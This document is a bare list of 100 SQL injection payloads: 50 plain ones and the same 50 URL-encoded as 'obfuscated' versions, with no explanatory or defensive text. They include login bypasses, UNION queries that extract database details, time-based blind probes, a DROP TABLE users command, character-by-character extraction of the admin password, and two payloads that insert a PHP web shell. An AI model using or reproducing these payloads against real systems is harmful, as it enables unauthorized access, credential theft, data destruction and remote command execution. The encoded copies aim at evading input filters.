**Original Payloads (1-50):**

1.  `' OR 1=1 --`
2.  `" OR 1=1 --`
3.  `' OR 'a'='a`
4.  `" OR "a"="a`
5.  `' OR 1=1; #`
6.  `" OR 1=1; #`
7.  `' UNION SELECT null,null,null --`
8.  `" UNION SELECT null,null,null --`
9.  `' UNION SELECT user(),database(),version() --`
10. `" UNION SELECT user(),database(),version() --`
11. `'; DROP TABLE users; --`
12. `"; DROP TABLE users; --`
13. `'+(SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END)+'`
14. `"+(SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END)+"`
15. `' AND (SELECT * FROM (SELECT(SLEEP(5)))a)='`
16. `" AND (SELECT * FROM (SELECT(SLEEP(5)))a)="`
17. `' AND 1=(SELECT COUNT(*) FROM information_schema.tables); --`
18. `" AND 1=(SELECT COUNT(*) FROM information_schema.tables); --`
19. `' OR id LIKE '%1%' --`
20. `" OR id LIKE '%1%' --`
21. `' AND substring(@@version,1,1)>5 --`
22. `" AND substring(@@version,1,1)>5 --`
23. `' AND (SELECT ascii(substring(user(),1,1))>0) --`
24. `" AND (SELECT ascii(substring(user(),1,1))>0) --`
25. `' AND (SELECT 1 FROM users WHERE username='admin') --`
26. `" AND (SELECT 1 FROM users WHERE username='admin') --`
27. `' AND EXISTS (SELECT * FROM users) --`
28. `" AND EXISTS (SELECT * FROM users) --`
29. `' AND 1=benchmark(5000000,MD5('A')) --`
30. `" AND 1=benchmark(5000000,MD5('A')) --`
31. `' OR SLEEP(5) --`
32. `" OR SLEEP(5) --`
33. `'); CREATE TABLE foo (line text); INSERT INTO foo (line) VALUES ('<?php system($_GET['cmd']); ?>'); --`
34. `"); CREATE TABLE foo (line text); INSERT INTO foo (line) VALUES ('<?php system($_GET['cmd']); ?>'); --`
35. `' || (SELECT password FROM users WHERE username = 'admin') || '`
36. `" || (SELECT password FROM users WHERE username = 'admin') || "`
37. `' AND (SELECT * FROM (SELECT NAME_CONST(version(),1))x)='`
38. `" AND (SELECT * FROM (SELECT NAME_CONST(version(),1))x)='`
39. `'+(SELECT 'x' WHERE 1=1)+'`
40. `"+(SELECT 'x' WHERE 1=1)+"`
41. `' AND 0<(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users') --`
42. `" AND 0<(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users') --`
43. `'+(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1)+'`
44. `"+(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1)+"`
45. `' AND (SELECT 1 FROM (SELECT username FROM users LIMIT 1) a)='`
46. `" AND (SELECT 1 FROM (SELECT username FROM users LIMIT 1) a)='`
47. `' AND (SELECT 1 FROM (SELECT password FROM users LIMIT 1) a)='`
48. `" AND (SELECT 1 FROM (SELECT password FROM users LIMIT 1) a)='`
49. `' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' --`
50. `" AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a' --`

**Obfuscated Payloads (1-50):**

1.  `%27%20OR%201%3D1%20--`
2.  `%22%20OR%201%3D1%20--`
3.  `%27%20OR%20%27a%27%3D%27a`
4.  `%22%20OR%20%22a%22%3D%22a`
5.  `%27%20OR%201%3D1%3B%20%23`
6.  `%22%20OR%201%3D1%3B%20%23`
7.  `%27%20UNION%20SELECT%20null%2Cnull%2Cnull%20--`
8.  `%22%20UNION%20SELECT%20null%2Cnull%2Cnull%20--`
9.  `%27%20UNION%20SELECT%20user%28%29%2Cdatabase%28%29%2Cversion%28%29%20--`
10. `%22%20UNION%20SELECT%20user%28%29%2Cdatabase%28%29%2Cversion%28%29%20--`
11. `%27%3B%20DROP%20TABLE%20users%3B%20--`
12. `%22%3B%20DROP%20TABLE%20users%3B%20--`
13. `%27%2B%28SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%20%27true%27%20ELSE%20%27false%27%20END%29%2B%27`
14. `%22%2B%28SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%20%27true%27%20ELSE%20%27false%27%20END%29%2B%22`
15. `%27%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%3D%27`
16. `%22%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29%3D%22`
17. `%27%20AND%201%3D%28SELECT%20COUNT%28*%29%20FROM%20information_schema.tables%29%3B%20--`
18. `%22%20AND%201%3D%28SELECT%20COUNT%28*%29%20FROM%20information_schema.tables%29%3B%20--`
19. `%27%20OR%20id%20LIKE%20%27%251%25%27%20--`
20. `%22%20OR%20id%20LIKE%20%27%251%25%27%20--`
21. `%27%20AND%20substring%28%40%40version%2C1%2C1%29%3E5%20--`
22. `%22%20AND%20substring%28%40%40version%2C1%2C1%29%3E5%20--`
23. `%27%20AND%20%28SELECT%20ascii%28substring%28user%28%29%2C1%2C1%29%29%3E0%29%20--`
24. `%22%20AND%20%28SELECT%20ascii%28substring%28user%28%29%2C1%2C1%29%29%3E0%29%20--`
25. `%27%20AND%20%28SELECT%201%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20--`
26. `%22%20AND%20%28SELECT%201%20FROM%20users%20WHERE%20username%3D%27admin%27%29%20--`
27. `%27%20AND%20EXISTS%20%28SELECT%20*%20FROM%20users%29%20--`
28. `%22%20AND%20EXISTS%20%28SELECT%20*%20FROM%20users%29%20--`
29. `%27%20AND%201%3Dbenchmark%285000000%2CMD5%28%27A%27%29%29%20--`
30. `%22%20AND%201%3Dbenchmark%285000000%2CMD5%28%27A%27%29%29%20--`
31. `%27%20OR%20SLEEP%285%29%20--`
32. `%22%20OR%20SLEEP%285%29%20--`
33. `%27%29%3B%20CREATE%20TABLE%20foo%20%28line%20text%29%3B%20INSERT%20INTO%20foo%20%28line%29%20VALUES%20%28%27%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%27%29%3B%20--`
34. `%22%29%3B%20CREATE%20TABLE%20foo%20%28line%20text%29%3B%20INSERT%20INTO%20foo%20%28line%29%20VALUES%20%28%27%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%27%29%3B%20--`
35. `%27%20%7C%7C%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%7C%7C%20%27`
36. `%22%20%7C%7C%20%28SELECT%20password%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%7C%7C%20%22`
37. `%27%20AND%20%28SELECT%20*%20FROM%20%28SELECT%20NAME_CONST%28version%28%29%2C1%29%29x%29%3D%27`
38. `%22%20AND%20%28SELECT%20*%20FROM%20%28SELECT%20NAME_CONST%28version%28%29%2C1%29%29x%29%3D%27`
39. `%27%2B%28SELECT%20%27x%27%20WHERE%201%3D1%29%2B%27`
40. `%22%2B%28SELECT%20%27x%27%20WHERE%201%3D1%29%2B%22`
41. `%27%20AND%200%3C%28SELECT%20COUNT%28*%29%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%29%20--`
42. `%22%20AND%200%3C%28SELECT%20COUNT%28*%29%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%29%20--`
43. `%27%2B%28SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%20LIMIT%201%29%2B%27`
44. `%22%2B%28SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%20LIMIT%201%29%2B%22`
45. `%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20username%20FROM%20users%20LIMIT%201%29%20a%29%3D%27`
46. `%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%20username%20FROM%20users%20LIMIT%201%29%20a%29%3D%27`
47. `%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20password%20FROM%20users%20LIMIT%201%29%20a%29%3D%27`
48. `%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%20password%20FROM%20users%20LIMIT%201%29%20a%29%3D%27`
49. `%27%20AND%20%28SELECT%20SUBSTRING%28password%2C1%2C1%29%20FROM%20users%20WHERE%20username%3D%27admin%27%29%3D%27a%27%20--`
50. `%22%20AND%20%28SELECT%20SUBSTRING%28password%2C1%2C1%29%20FROM%20users%20WHERE%20username%3D%27admin%27%29%3D%27a%27%20--`